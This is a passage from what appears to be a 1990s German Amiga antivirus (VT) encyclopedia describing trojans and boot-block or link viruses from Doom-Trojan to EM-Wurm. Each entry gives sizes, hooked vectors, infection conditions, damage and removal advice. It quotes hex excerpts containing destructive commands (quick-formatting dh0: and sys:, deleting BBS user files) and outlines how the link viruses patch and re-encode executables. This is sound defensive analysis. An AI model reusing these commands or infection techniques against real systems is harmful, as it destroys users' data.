06-01.NU..H.72&H ;........ 20534365 4e452069 53204c61 4d45202d SCeNE iS LaME - 20536947 4e654420 42792052 6f414453 SiGNeD By RoADS 54615252 2f4c7344 20202020 20202020 TaRR/LsD 646f732e 6c696272 61727900 666f726d dos.library.form 61742064 72697665 20646830 3a206e61 at drive dh0: na 6d652046 75434b6f 46462066 66732071 me FuCKoFF ffs q 7569636b 0a8c018d 000003ec 00000003 uick............ Eine echte Meisterleistung !!!! - Doom-Trojan File gegen BBS Laenge gepackt: 406012 Bytes Laenge entpackt: 407688 Bytes Das File enthaelt 380KB Muell (DMSMaPuS, ProTracker usw.) . Wahrscheinlich soll die Filelaenge eine Doom-Variante glaub- haft machen. Wenn man den Rest des File mit not.b d0 decodiert, findet man drei Files (assign, copy und diskfont.library), ein Ueberschreibfile (s.u.) und einen Text: f7fdfbef f8fd646f 732e6c69 62726172 ......dos.librar 79005245 53544943 54454400 6262733a y.RESTICTED.bbs: 75736572 2e646174 61006262 733a7573 user.data.bbs:us 65722e6b 65797300 633a436f 70790063 er.keys.c:Copy.c 3a417373 69676e00 6c696273 3a646973 :Assign.libs:dis 6b666f6e 742e6c69 62726172 79000000 kfont.library... Aufgabe des "sinnvollen" Teiles: - decodiere mit not.b d0 - Kopiere 3 Files (Dos-Funktionen). - setze bei copy und assign mit setfiledate (ab KS 2.04) das Datum 2. Sept 1992 - setze bei diskfont.library das Datum 10. Juni 1994 - setze pure-Flag bei assign und copy - setze execute-Flag bei diskfont.library - setcomment RESTICTED bei user.data und user.key - arbeitet mit getprgname (ab KS 2.04) und ueberschreibt das Ursprungs-Doom-File mit einem neuen Prg. Laenge:32020 Bytes Dieses neue Prg veraendert Bildschirmausgabe und Audiodaten. Dieses Programm enthaelt wieder jede Menge Muell-Bytes, die nie erreicht werden. Etwas sinnvolles habe ich bei Tests auf dem Monitor mit diesem neuen File NICHT gesehen. Dringende Empfehlung: Loeschen - Doom-Assign File Original-Assign duerfte sein: 37.4 (25.4.91) 3220 Bytes Assign-Trojan gepackt: 3220 Bytes Es wurde also Wert darauf gelegt, die Laenge gleich zu halten. Dennoch MUSS das File in c auffallen, da es sich um einen seltenen Packer handelt. Das Trojan-Assign kann sich NICHT selbst vermehren. Die Assign-Funktion wird erfuellt. Verbiegt $74 (s.u. bei diskfont.library) Aber: die Bytes auf die getestet wird sind anders: - 66495265 664C7921 0D - "fIRefLy!",0d Empfehlung: Loeschen und Original-Assign aufspielen. - Doom-Copy File Original-Copy duerfte sein: 38.1 (20.5.92) 5496 Bytes Copy-Trojan gepackt: 5496 Bytes Es wurde also Wert darauf gelegt, die Laenge gleich zu halten. Dennoch MUSS das File in c auffallen, da es sich um einen seltenen Packer handelt. Das Trojan-Copy kann sich NICHT selbst vermehren. Die Copy-Funktion wird erfuellt. Verbiegt $74 (s.u. bei diskfont.library) Aber: die Bytes auf die getestet wird sind anders: - 6C554E69 54496321 0D - "lUNiTIc!",0d Empfehlung: Loeschen und Original-Copy aufspielen. - Doom-diskfont.library File Original duerfte sein: 39.3 (14.7.92) 15340 Bytes Doom-diskfont.library NICHT gepackt : 15820 Bytes Die Trojan-diskfont.library kann sich NICHT selbst vermehren. Die diskfont.library-Funktionen werden erfuellt. Es wurde ein kleines Trojanteil eingebaut. Um diesen Code auszufuehren, wurde vor viele RTS im Original-Prg. ein Sprung- befehl gesetzt. Original: Trojan: 020: 00000dc3 70ff4e75 ....p.Nu 020: 00000e38 70ff6100 ...8p.a. ^^^^ 028: 4afc0000 00040000 J....... 028: 376c4e75 4afc0000 7lNuJ... ^^^^ ;.... 128: 4e754caf 00030004 NuL..... 128: 00402c5f 61003666 .@,_a.6f ^^^^^^^^ 130: c0ef000a c2ef0008 ........ 130: 4e754caf 00030004 ;usw.... Empfehlung: Loeschen und Original aufspielen. Enthaltenes Trojan-Teil: - Test auf mind. 68010 dann VBR sonst Zero-Page - Test ob $74 schon verseucht (#$48E7C0C0) - falls nein - rette Orig-$74-Adresse - belege 2x Speicher - verbiege Adresse - kopiere Virusteil in Speicher Kopiertes Trojan-Teil: - sucht ueber $DFF018 (seriell) nach einzelnen Bytes - 4B696E47 41436821 0D - "KinGACh!",0d Damit kann ich nichts anfangen. Das Teil duerfte "nur" fuer Mailbox-Betreiber gefaehrlich sein. - DOOR_BELLS-Trojan File Laenge ungepackt: 15308 Bytes Filename: z.B. EXE_THIS_FIRST!.EXE anderer Name: MST-VEC Virus, Rel 01.28 Virus Keine verbogenen Vektoren. Bei mir nicht lauffaehig, da eine rexxplslib.library gefordert wird, die ich nicht habe. Vermutlich sollen verschiedene LWe schnellformatiert werden. Einen aehnlichen Vorgang finden Sie auch im MultiChat-Trojan. (siehe unten) Fileauszug: 636f7079 203e4e49 4c3a2073 79733a73 copy >NIL: sys:s 79737465 6d2f666f 726d6174 2072616d ystem/format ram 3a646400 00060542 72616d3a 64640045 :dd....Bram:dd.E 05387261 6d3a6464 203e4e49 4c3a2044 .8ram:dd >NIL: D 52495645 20737973 3a204e41 4d45203d RIVE sys: NAME = 444f4f52 5f42454c 4c533d20 4e4f4943 DOOR_BELLS= NOIC 4f4e5320 44495243 41434845 20515549 ONS DIRCACHE QUI 434b2046 46532000 004405b5 72616d3a CK FFS ..D..ram: 6464203e 4e494c3a 20445249 56452064 dd >NIL: DRIVE d 68303a20 4e414d45 203d444f 4f525f42 h0: NAME =DOOR_B 454c4c53 3d204e4f 49434f4e 53204449 ELLS= NOICONS DI 52434143 48452051 5549434b 20464653 RCACHE QUICK FFS .usw ..... - DOpus-Trojan siehe oben bei CoP-Trojan Typ C - DOpus-Virus Filename:dopusrt Laenge ungepackt: 6408 Bytes Bleibt NICHT im Speicher. Von der Definition kein Virus, da keine Vermehrung. Einbruchswerkzeug gegen Mailboxen. Veraendert zwei Files und fuehrt dann das OrigPrg aus. Empfehlung: loeschen VT erkennt File: 15.01.93 Im File ist zu lesen: 61727900 00626273 3A757365 722E6461 ary..bbs:user.da 74610000 00000000 00000000 00000000 ta.............. ;...... 00000000 00000000 6262733A 75736572 ........bbs:user 2E6B6579 73000000 00000000 00000000 .keys........... ;...... 00000000 00000000 00000000 416E6479 ............Andy 2F446563 61646500 00000000 00000000 /Decade......... 00000000 00000000 00000031 39393200 ...........1992. 00000000 3E2D442D 452D432D 412D442D ....>-D-E-C-A-D- 452D3C00 00000000 00000000 00000000 E-<............. 00003034 302F3735 35333637 32000000 ..040/7553672... Nachtrag 04.03.93: Es ist ein 2. File aufgetaucht, an das dieses gleiche Teil angelinkt ist. Auch dieses File ge- hoert zu DOpus. CRC Laenge ungepackt: 20716 Bytes Nachtrag 06.03.93: Da jetzt 2 Testfiles vorhanden sind, wurde eine Ausbauroutine eingebaut. Da diese Routine nur an zwei Files getestet werden kann, koennte sie wackeln. Fertigen Sie bitte deshalb vor dem Ausbauversuch UNBEDINGT eine Kopie des verseuchten Files an. Danke - DOSSPEED (Neuseeland) richtiger Name: Revenge of the Lamer - Dotty-Virus immer $7F000 KickTag, KickCheckSum Im Programm: DoIo, Vec5 Fordert trackdisk.device NICHT Vermehrung: BB Weitere Schaeden: Modifiziert PRIVAT-intuition-struktur. - Dotty-MAFIA-Virus: Text geaendert und falscher Sprung. 4d202041 20204620 20492041 2020202e M A F I A . - Dotty-MAFIA-Inst. gepackt: 1360 Bytes entpackt: 1928 Bytes Ein 3c(a7)-Link File (s.o.), das einen Dotty-MAFIA.BB im Speicher verankern soll. Das Teil war an ALFaus (richtig, das Original-Programm liegt auf der VT-Disk im Unterver- zeichnis Utility) gelinkt. VT bietet nur loeschen an. Ein Ausbau lohnt nicht. Da bei der Verankerung im Speicher, absolute Speicheradressen, die bei vielen Rechnern nicht belegt sind, verwendet werden, erscheint haeufig der GURU. - DriveInfo V0.91 by ESP trojanisches Pferd, Laenge: 1704 Bytes (PP-Data und ein decrunch-header davor) entpackt: Laenge: 1740 Bytes Im File ist dann z.B. zu lesen: EAST SIDE POWER 91/92 KS2.04: NEIN Findet dann KEIN Laufwerk und meldet sich mit Requester. Nach kurzer Zeit dann GURU beim Arbeiten. Versucht unter KS1.3 zu taeuschen, indem Laufwerksdaten (Drive, Volume usw.) ausgegeben werden. Verhindert hierbei AutoRequest. Installiert mit addintserver "Install yeah!" . Wird nach Crime!++ - Installierung mit Rem- IntServer wieder entfernt. Interrupt = 5 . Installiert nach etwa EINER Minute (das ist echt neu) Crime!++ im Speicher (Cool, wait usw. s.o.). Empfehlung: sofort loeschen siehe auch : Crime!++ - DSC101-Virus Zerstoerungsfile gegen BBS: Ungepackt Laenge: 33152 Bytes . VT kennt nur die ungepackte Version, weil mir das Prg. ungepackt zugeschickt wurde. Von der Definition KEIN Virus, da keine Vermehrungsroutine vorhanden. Grosse Teile des Prg.s bestehen nur aus Null-Bytes. Ein Teil des wirklichen Prg.s ist codiert mit: not.b (a0)+ Das Prg. bleibt NICHT im Speicher Das Prg versucht durch eine Cli-Ausgabe zu taeuschen: Disk Speed Check V1.01ß - © Micro-Tech Softwares® 1992 Programming by Alan Forslake. (1.10.1992) Usage : DSC -mode <drive>, Where mode is : 1=disk speed check 2=scsi speed test Didnt` found a supported SCSI drive, sorry! Try to contact Alan Forslake on :223/22/32 in@sf@com In Wirklichkeit wird versucht (aber wirklich nur versucht) folgende Teile zu loeschen: bbs:user.keys bbs:user.data sys:s/startup-sequence s:acp.startup Empfehlung: einfach loeschen VT Fileerkennung getestet: 19.10.92 - DTL-Virus BB Micro-System-Clone s.u. 51c8ffee 4ef90007 f7944454 4c214454 Q...N.....DTL!DT 4c201d5a 19594f55 52204449 534b2049 L .Z.YOUR DISK I 5320494e 46454354 45442042 59201d65 S INFECTED BY .e - DUMDUM BB auch mit KS2.04 immer ab $7FA00 Cool, im Prg DoIo, $64, $80 (Hallo Enforcer-Freunde) Text im BB lesbar: You are the owner of a DUMDUM virus please unprotect disk disk to kill! (machen Sie das BITTE NICHT) Textausgabe mit DisplayAlert Schaeden und Vermehrung: - Vermehrung ueber BB oder: - Format Disk - DUMDUM-Clone: DisplayAlert-Text geaendert. - DUMDUM-TAI5-Clone Text geaendert: 00000013 2e2e2e2e 2e2c3b2d 3a3a542e .........,;-::T. 412e492e 203b2e2e 292e2e2e 2e2e2e2e A.I. ;..)....... - DUMDUM-Clone-Inst. gepackt: 1332 Bytes entpackt: 1916 Bytes Ein 3c(a7)-Link File (s.o.), das einen DUMDUM-Clone.BB im Speicher verankern soll. Das Teil war an 6Vekaus (richtig, das Original-Programm liegt auf der VT-Disk im Unterver- zeichnis Utility) gelinkt. VT bietet nur loeschen an. Ein Ausbau lohnt nicht. Die Dummheit zeigt sich daran, dass ein BB im Speicher verankert wird und anschliessend mit dem Orig-6Vekaus-Aufruf die sechs wichtigsten Vektoren wieder geloescht werden. - DUM2DUM-Virus BB Block 0-5 = 6 Bloecke Cool, DoIo KS1.3 : Ja KS2.04: Ja (Vermehrung) Versucht durch Anzeige eines sauberen BBs zu taeuschen. Namensbegruendung: Im Speicher ist zu lesen: 646f732e 6c696272 61727900 61000000 dos.library.a... 00000000 00004455 4d3c4949 3e44554d ......DUM<II>DUM Schaden 1: Mit dem verbogenen DoIo findet die Vermehrung statt. Files, die ab Block 2 liegen, werden ueberschrieben und sind NICHT zu retten. VT wird dann bei Block-Kette Bad-T.Data ausgeben, sobald ein File Block 2-5 belegt hatte. Schaden 2: Ab $6E000 werden 2 Zeiger geaendert. Dies fuehrt haeufig zu Bitmap ungueltig. $6E000 ist nur bei DD-Disk der Rootblock. Vorher: Nachher: 130: 000000f2 0000018d ........ 130: 000000f2 0000018d ........ 138: ffffffff 00000332 .......2 138: 00000000 00000332 .......2 ^^^^^^^^ ^^^^^^^^ 140: 00000000 00000000 ........ 140: 00000000 00000000 ........ ;....... 198: 00000000 00000000 ........ 198: 00000000 00000000 ........ 1a0: 00000000 000053b9 ......S. 1a0: ffffffff 000053b9 ......S. ^^^^^^^^ ^^^^^^^^ Es wird also bei naechster Gelegenheit der Disk-Validator aktiv, der aber nichts mit dem Virusteil zu tun hat. Schaden 3: Sobald eine Zaehlzelle den Wert $50 erreicht hat, wird in der dos.lib ein Wert mit cmpi.w #$4EF9,(a0) getestet. Stimmt das Ergebnis nicht, so wird dosopen, dosread und doswrite verbogen. Sobald dieser Virusteil aktiviert ist, treten haeufig GURUS auf. Aber es reicht leider immer fuer die Zerstoerung einiger Files. Diese Files koennen leider NICHT gerettet werden und werden von VT auch nicht erkannt. Der geschriebene Muell ist auch von $DFF007 abhaengig. Beispiele: Vorher: Nachher: 000: 000003f3 00000000 ........ 000: 000003f3 00000000 ........ 008: 00000002 00000000 ........ 008: 00000002 00000000 ........ 010: 00000001 0000009e ........ 010: 2e2e2e2e 2e2e2e2e ........ 018: 00003246 000003e9 ..2F.... 018: 2e2e2e2e 2e2e2e2e ........ 020: 0000009e 487a01c8 ....Hz.. 020: 2e2e2e2e 2e2e2e2e ........ 028: 48e7fffe 49fafff2 H...I... 028: 2e2e2e2e 2e2e2e2e ........ 030: 2054d1c8 d1c85848 T....XH 030: 2054d1c8 d1c85848 T....XH 038: 2648504b 2c780004 &HPK,x.. 038: 2648504b 2c780004 &HPK,x.. Vorher: Nachher: 000: 000003f3 00000000 ........ 000: 00000000 00000000 ........ 008: 00000009 00000000 ........ 008: 00000000 00000000 ........ 010: 00000008 0000001e ........ 010: 00000000 00000000 ........ 018: 00002274 00000c73 .."t...s 018: 00000000 00000000 ........ 020: 00000520 00001542 ... ...B 020: 00000000 00000000 ........ 028: 00000500 00000080 ........ 028: 00000000 00000000 ........ 030: 000021a9 0000123d ..!....= 030: 00000000 00000000 ........ 038: 000003e9 0000001e ........ 038: 00000000 00000000 ........ - DUNGEON-OF-DOOM Trojan siehe bei COP Typ-L - DYNAMIX-Virus BB Loeschen Es duerfte sich um einen Pentagon.BB mit geaendertem Text handeln. Immer ab $7FB00 Cool $7Fb4c und DoIo im Prg. Testet auf einige VirenLangworte Schreibt sich auf DOS0-Disketten Fordert trackdisk.device NICHT !!! Im BB ist zu lesen: 14546865 2044594e 414d4958 20564952 .The DYNAMIX VIR 5553204b 494c4c45 52205634 2e30205b US KILLER V4.0 [ - East-Star-Virus BB NorthStar-Clone Immer ab $7EC00, Cool im Prg. DoIo Fordert trackdisk.device NICHT Namensbegruendung: 00784561 73742d20 53746172 00020002 .xEast- Star.... Weitere im BB lesbare Texte: 00500c4e 6f205669 72757320 6973206f .P.No Virus is o 6e207468 65204469 736b2052 45442042 n the Disk RED B 55524e49 4e472042 49475354 41520000 URNING BIGSTAR.. usw. - East-Star-Install File Laenge ungepackt: 8340 Bytes An das Prg. MComm wurde mit Hunklab ein East-Star-BB mit Install-Routine angelinkt. In diesem angelinkten Teil ist "trackdisk.device" zu lesen. VT bietet Ausbau an. - EASY-E-BBS-Trojan File verseucht Laenge: 38860 Bytes Teil ausgebaut Laenge: 38416 Bytes Verlaengerung also 444 Bytes Keine verbogenen Vektoren Im File ist zu lesen: 00000000 00000000 00000000 00004541 ..............EA 53592d45 00006468 303a6262 732f7573 SY-E..dh0:bbs/us 65722e64 61746100 00000000 000003f2 er.data......... Schaden: Einbruchswerkzeug fuer BBS Nach dem Ausbau mit VT sollte ein Paradox Starfield-Intro uebrigbleiben. Lauffaehigkeit A2000 68030 ja A4000/40 nein Nachtrag 10.05.94: Ein anderes AntiVirusProgramm erkennt auch noch NACH dem erfolgreichen Ausbau mit VT den EASY-Trojan. Ich nehme an, dass diese Fehlerkennung im naechsten Update (Juni 94) be- hoben sein wird. - Ebola-Inst. File Bekannte Filenamen: speedmaker.exe (gepackt 16252) (soll laut Fenster (Speedmaker 1.87) ein Testprg. sein ) Loadwb (2280) (enthaelt neben Ebola auch noch einen DFF006-Bereich, der in meinen LoadWB-Files nicht vorkommt) Nur Loeschen sinnvoll - Ebola-Virus Link Mind. KS 37 Nicht Resetfest Fileverlaengerung: 1116 Bytes Verbogene Vektoren: Loadseg, FindTask, OpenResource Ueberlaeuft 3E8 und 3F1-Hunks Haengt sich hinter ersten Hunk. Codiert sich mit $DFF006 Im decodierten Linkteil ist zu lesen: 2d2a -* 5b45626f 6c612028 63292039 342c3935 [Ebola (c) 94,95 205a6169 72652e5d 2a2d536e 6f6f7044 Zaire.]*-SnoopD 6f730000 536e6f6f 70446f73 20537570 os..SnoopDos Sup 706f7274 2050726f 63657373 00002e00 port Process.... Ablauf: Zuerst Test auf SnoopDos (falls ja, nicht im Speicher ein- haengen). Test auf Disk Val. Mind. 5 Bloecke frei File groesser #2500 und kleiner #130000 Bytes (also kann Loadwb s.o. nicht durch Verseuchung entstanden sein, sondern wurde anders manipuliert) Test auf $AB1590EF (schon verseucht) Suche nach $4EAE ( jsr -xy(Lib-Base) ) ( xy ist variabel ) Falls gefunden, Test ob Abstand zu Hunkende kleiner $7FFE. $4EAE wird in $4EBA ( jsr Hunkende(PC) ) geaendert. VT sollte das Teil im Speicher finden. VT sollte das Teil aus Files ausbauen koennen und den Original- sprungbefehl wieder setzen. - EF67A3C3-LVirus Link Fileverlaengerung: 1392 Bytes Verbogener Vektor: LoadSeg Namensbegruendung: s.u. KS1.3: ja Im File ist zu lesen: 00000153 6004ef67 a3c348e7 fffe2c79 ...S`..g..H...,y ;.... ^^^^^^^^^ Namensbegruendung 000003ec 00000001 00000001 000000cc ................ ^^^^ 00000000 000003f2 000003ea 00000069 ...............i ^^^^ Speichereinbindung: Ueber LoadSeg Dabei wird ueber das Langwort $EF67A3C3 (s.o.) ueberprueft, ob das Teil im Speicher schon aktiv ist. Link an ein File: Medium nicht WriteProtect (ganz alt ??? Disk ???) File ausfuehrbar (3F3) CodeHunk (3E9) wird gefunden KEIN Test auf bestimmte Filelaengen KEIN Test auf Buchstaben im Filenamen File noch nicht verseucht (Test mit EF67A3C3) Ueber eine Zaehlzelle wird erreicht, dass nicht jeder LoadSeg- Aufruf zu einem Linkversuch fuehrt. Das Teil linkt sich als neuer 1.Hunk vor den Original-1.Hunk. Deshalb muss das Teil auch die Relocs der folgenden Hunks ver- aendern. Das Teil braucht auch einen Reloc-Hunk (s.o.) fuer sich selbst. Die 3E9-Kennung des Original-1.Hunks wird in 3EA (s.o.) geaendert Warum: keine Ahnung (3EA = Data) VT versucht das Teil auszubauen und auch die Reloc-Hunks zurueck- zusetzen. VT sucht auch nach der 3EA-Kennung. Falls diese nicht gefunden wird, sollte die Meldung "Hunkstruk. defekt" erscheinen. - Elbereth-LVirus Linkvirus Namensbegruendung: Im decodierten LinkTeil ist zu lesen: 0cbbbb20 456c6265 72657468 2120abab ... Elbereth! .. Fileverlaengerung: #936 Bytes Nicht Resetfest Verbogene Vektoren: Open LoadSeg Test auf mind. KS2.04: ja Speicherverankerung: - Test ob schon im Speicher - Loadseg und Open wird verbogen - Testet spaeter geladene Filenamen auf "v" oder "V". Linkvorgang: - mit LoadSeg und Open - File noch nicht verseucht - Medium validated - 4 Block frei - File ausfuehrbar ($3F3) - CodeHunk wird gefunden ($3E9) - 1.Hunk nicht groesser als #32764 (wg. Sprung) - Das erste LW des 1.Hunks wird durch bsr Virus ($6100wxyz) oder jsr Virus ($4EBAwxyz) ersetzt. Abhaengig von $DFF007 - Link hinter den 1.Hunk - das Teil codiert sich immer neu mit $DFF007 Zerstoerung: Start 2.Obj.: +# 0 Data-File vorher: Data-File nachher 000: 31323334 35363738 12345678 000: 33343132 37383536 34127856 008: 39306162 63646566 90abcdef 008: 61623930 65666364 ab90efcd - Abhaengig von $DFF007 - Falls kein $3F3 gefunden, also Data-File - Im Langwort werden jeweils die vorderen zwei Bytes mit den hinteren zwei Bytes vertauscht. VT kann diese Data-Files NICHT erkennen und NICHT zurueck- setzen. Meldung: - Abhaengig von der SystemZeit und einem Wert im Linkteil. ($4AF = 19:59) - DisplayAlert (Text siehe oben) - Danach Reset VT versucht die Vektoren im Speicher zurueckzusetzen. Dies geht NICHT, falls der Elbereth-Installer die Vektoren verbogen hat. Das Teil befindet sich in einer Schleife und kehrt nie zum Cli-Prompt zurueck. Hier hilft nur ein Reset und Boot von einer sauberen Disk. Werden die Vektoren von verseuchten Files ver- bogen, so sollte VT in der Lage sein, die Vektoren zurueckzu- setzen. VT versucht den Linkausbau bei einem ausfuehrbaren File. - Elbereth2-Virus Linkvirus Namensbegruendung: Im decodierten LinkTeil ist zu lesen: 00044eee fd2a00c8 0c456c62 65726574 ..N..*...Elberet 68203220 20202028 63292031 39393620 h 2 (c) 1996 Fileverlaengerung: #772 Bytes Nicht Resetfest Verbogener Vektor: LoadSeg Test auf mind. KS2.04: ja Speicherverankerung: - Test ob schon im Speicher - Loadseg wird verbogen - Testet spaeter geladene Filenamen auf "v" oder "V". Linkvorgang: - mit LoadSeg - File noch nicht verseucht - Medium validated - 4 Block frei - File ausfuehrbar ($3F3) - CodeHunk wird gefunden ($3E9) - 1.Hunk nicht groesser als #32764 (wg. Sprung) - Filelaenge kleiner #60000 - Das erste LW des 1.Hunks wird durch jsr Virus ($4EBAwxyz) ersetzt. - das Teil codiert sich immer neu mit $DFF007 Meldung: - Abhaengig von den SystemSekunden ($CE4 = 66 Sek. = Schwach- sinn) und den Systemtagen soll mit DisplayAlert (Text siehe oben) eine Ausgabe erfolgen. - Danach Reset VT versucht den Vektor im Speicher zurueckzusetzen. VT versucht den Linkausbau bei einem ausfuehrbaren File. - Elbereth3-Virus Linkvirus vgl. auch Disnomia Namensbegruendung: Im decodierten LinkTeil ist zu lesen: 0c3d3d20 456c6265 72657468 2033203d .== Elbereth 3 = Fileverlaengerung: #900 Bytes Nicht Resetfest Verbogene Vektoren: LoadSeg NewLoadSeg KS2.04 + 68030 : ja KS40.63 + 68030: bei mir bei Vermehrungsversuch immer GURU Speicherverankerung: - Test ob schon im Speicher - Loadseg und NewloadSeg wird verbogen - Testet spaeter geladene Filenamen auf "v" oder "V". Linkvorgang: - mit LoadSeg und NewLoadSeg - File noch nicht verseucht (Datum) - Medium validated - 4 Block frei - File ausfuehrbar ($3F3) - CodeHunk wird gefunden ($3E9) - Filelaenge groesser #1800 - File kleiner einem bestimmten Wert, abhaengig von der Gesamtblockzahl des Mediums. - Gesucht wird am Ende des 1.Hunks in einem Bereich von #32736 ($3ff0 x 2) nach bcc ($6v00wxyz), jsr xy ($4EBAwxyz) oder jsr -xy(a6) ($4EAE Fxyz) - Dieses LW wird durch bsr Virus ($6100wxyz) ersetzt. - das Teil codiert sich immer neu mit $DFF007 - versucht ProtectionBits zu retten Meldung: - Abhaengig von den SystemZeit ($4AF = 19:59) und den Systemtagen soll mit DisplayAlert (Text siehe oben) eine Ausgabe erfolgen. - Danach Reset VT versucht die Vektoren im Speicher zurueckzusetzen. VT versucht den Linkausbau bei einem ausfuehrbaren File. Hinweis: Wenn Sie ein verseuchtes File kopieren und dabei das Filedatum nicht mitnehmen, so kann dieses File noch einmal verseucht werden. Es sind also Mehrfachlinks (im Test) moeglich. - Elbereth4-Virus Linkvirus Namensbegruendung: Im decodierten LinkTeil ist zu lesen: 4eaefd84 2c5f4e75 00be0c3d 3d20456c N...,_Nu...== El 62657265 74682034 203d3d20 202020a9 bereth 4 == . 20313939 3620506f 6c616e64 0000646f 1996 Poland..do 732e6c69 62726172 79005657 506f7274 s.library.VWPort 00566972 75735a5f 49490056 69727573 .VirusZ_II.Virus 5f436865 636b6572 28ae2900 00000000 _Checker(.)..... Fileverlaengerung: #1000 Bytes Nicht Resetfest Verbogener Vektor: LoadSeg KS2.04 + 68030 : ja KS40.63 + 68030: bei mir bei Vermehrungsversuch immer GURU Speicherverankerung: - Test ob schon im Speicher - Test ob Antivirusprg.e aktiv (s.o.) - Loadseg wird verbogen - Testet spaeter geladene Filenamen auf "v" oder "V". Linkvorgang: - mit LoadSeg - File noch nicht verseucht (Datum) - Medium validated - 4 Block frei - File ausfuehrbar ($3F3) - CodeHunk wird gefunden ($3E9) - Ueberlaeuft $3F1-Hunks - Filelaenge groesser #4000 - File kleiner einem bestimmten Wert, abhaengig von der Gesamtblockzahl des Mediums. - Gesucht wird am Ende des 1.Hunks in einem Bereich von #32736 ($3ff0 x 2) nach bcc ($6v00wxyz), jsr xy ($4EBAwxyz) oder jsr -xy(a6) ($4EAE Fxyz) - Dieses LW wird durch bsr Virus ($6100wxyz) oder jsr Virus (4EBAwxyz) ersetzt. - das Teil codiert sich immer neu mit $DFF007 - versucht ProtectionBits zu retten (falls Sie aber vorher mit VT Pruefsummen gebildet haben, wird die Veraenderung auch mit einem aelteren VT erkannt.) Meldung: - Abhaengig von den SystemZeit ($4B0 = 20:00) und den Systemtagen soll mit DisplayAlert (Text siehe oben) eine Ausgabe erfolgen. - Danach Reset VT versucht den Vektor im Speicher zurueckzusetzen. VT versucht den Linkausbau bei einem ausfuehrbaren File. Hinweis: Wenn Sie ein verseuchtes File kopieren und dabei das Filedatum nicht mitnehmen, so kann dieses File noch einmal verseucht werden. Es sind also Mehrfachlinks (im Test) moeglich. - ELECTROVI.Virus BB FORPIB-Clone siehe unten Nur Text geaendert: 454c4543 54524f2d 56495349 4f4e2020 ELECTRO-VISION 2020414e 54492d56 49525553 20202020 ANTI-VIRUS 46312d31 31202020 20524f52 52592020 F1-11 RORRY - ELENI!-Installer siehe bei MessAngel-Inst. - ELENI!-B-Virus siehe bei MessAngel-B-Virus - ELENI!.BB siehe bei MessAngel.BB - ELENI-Clock-Virus BB Im BB ist zu lesen: 202a454c 454e492a 20000000 00000000 *ELENI* ....... KS 1.3: nein KS 2.0: ja Fordert trackdisk.device NICHT Im Speicher immer ab $7F144 Verbogene Vektoren: Cool $7F296, DoIo $7F2DA, SumKickData $7F32A Vermehrung: Als BB Dabei wird zuerst der Orig-BB eingelesen und nach einem LW ( $4EAEFE38 = jsr -$1c8(a6) ) im BB gesucht. In den Original Commodore-BBen kommt es nicht vor. Falls dieses LW gefunden wird, so wird zuerst der Original-BB auf die Disk nach $D9400 = Bl 1738/39 gerettet. VT sucht beim Test (Gadget O-BB) nach dem ausgelagerten BB. Ein File das an dieser Stelle liegt, ist natuerlich ueberschrieben und NICHT mehr zu retten. Nach einem Reset und dem Start von dieser Disk versucht das BB-Virusteil den Orig-BB nach $7A000 zu laden und falls ge- funden nach dem Verbiegen der Vektoren mit JMP $7A00C auszu- fuehren. cmpi.b #$37,$BFEC01 Test auf li.Alt-Taste = Fluchttaste Schaeden: Es werden mehrere Hardware-Register veraendert. (z.B. das Datum aendert sich) Hinweis: beim A2000A liegt die Uhr aber bei $D80000 . Beispiele: Falls $DC002D groesser als 4 ist und in $60000 1 steht, wird im Cli mehrmals *ELENI* ausgegeben. Falls $DC002D #1 oder $BFE901 #9 sind, springt das Prg. zu einer Endlosschleife mit Kopfstep und LED-Blinken. Es hilft nur ein Reset. Bitte booten Sie von einer sauberen Disk und vergessen Sie nicht, die Uhr neu zu stellen, falls eine Hardware-Uhr vor- handen ist. Hinweis 1: Das VirusTeil belegt Speicher ohne AllocMem. Andere Prge. z.B. VT koennen bei wenig Speicher das Virusteil ueberschrei- ben. Hinweis 2: Es wird IMMER ein DOS0-Virus-BB geschrieben. Auf einer Disk mit FFS-Struktur kann nach dem naechsten Schreibzugriff, die Disk-Struktur beschaedigt sein. Anzeichen dafuer: VT meldet beim Filetest IMMER bad Data . Versuchen Sie dann bitte einen DOS1-BB (FastFileSystem) oder gar DOS5-BB aufzuspielen. Manchmal koennen Sie noch etwas retten. - ELENI-Wirus BB (ja W statt V) siehe unten bei Mount-Virus Bitte verwechseln Sie diesen BB nicht mit dem ELENI-Clock-Virus - Elien-Trojan File Laenge gepackt: 1016 Bytes Laenge ungepackt: 596 Bytes Keine verbogenen Vektoren Keine Vermehrung Im File ist zu lesen: 79000000 00000000 00000000 7379733a y...........sys: 4d654761 53555858 2e545854 00006161 MeGaSUXX.TXT..aa 61616161 61610024 5645523a 456c6965 aaaaaa.$VER:Elie 6e5f7669 7275735f 63686563 6b657220 n_virus_checker Wird also wahrscheinlich als Virus-Checker fuer die startup- seq. angeboten. Schaden: Legt nach dem Start ein File mit dem Namen MeGaSUXX.TXT an und schreibt in einem loop 9 Bytes aaaa aaaa 0 in dieses File. Der Loop (move.l #$186a0,d0) hat #100000 Durchlaeufe. Also wird das File 900000 Bytes lang. Im MeGaSUXX.TXT-File koennen Sie lesen: 61616161 61616161 00616161 61616161 aaaaaaaa.aaaaaaa 61006161 61616161 61610061 61616161 a.aaaaaaaa.aaaaa usw. Falls das Speichermedium inzwischen voll wird, erscheint bei mir ein Disk-Full-Requester. Dann muss Ihnen aber wirklich auf- fallen, dass etwas nicht stimmt. Es handelt sich um eine Anfaengerprogrammierung und einige Teile werden nie erreicht. VT bietet nur loeschen an. - EM-Wurm (zielgerichtet gegen EUROMAIL) nicht resetfest immer: schreibt in startup-sequence $A0,$0A (1.Zeile) eigener Process: clipboard.device schreibt in c: $A0, Laenge: 3888 Bytes (ASCII-Text vorhanden) schreibt in 5.Byte von c:protect (falls vorhanden) $01 Folge: protect wird unbrauchbar Zerstoerungsroutine: Wird nur ausgefuehrt wenn Verzeichnis EM, EUROMAIL oder EUROSYS vorhanden ist. Ueberschreibt alle Files in obengenannten Schubladen mit Speicherinhalt ab MsgPort. In zerstoerten Files ist ab $BC clipboard.device zu lesen. Dann wird mit dosdelay $259A eine 3 Minuten Pause eingelegt. Nach dieser Pause wird die Zerstoerungsroutine wieder in der Schleife aufgerufen. Ursprungsprogramm: QuickInt PP-crunched Laenge: 3196 Bytes Mein VT loescht den Process n i c h t, sondern fuellt ihn mit NOP's. Einige Programmteile, z.B. Autorequester, con usw. konnten nicht getestet werden, weil ich EUROMAIL nicht besitze. Diese Teile werden ebenfalls mit NOP's ueberschrieben. Falls des- halb bei aktivem EUROMAIL-Programm ein GURU erscheint, bitte ich um Hilfestellung. Danke !! - EOL-Trojan 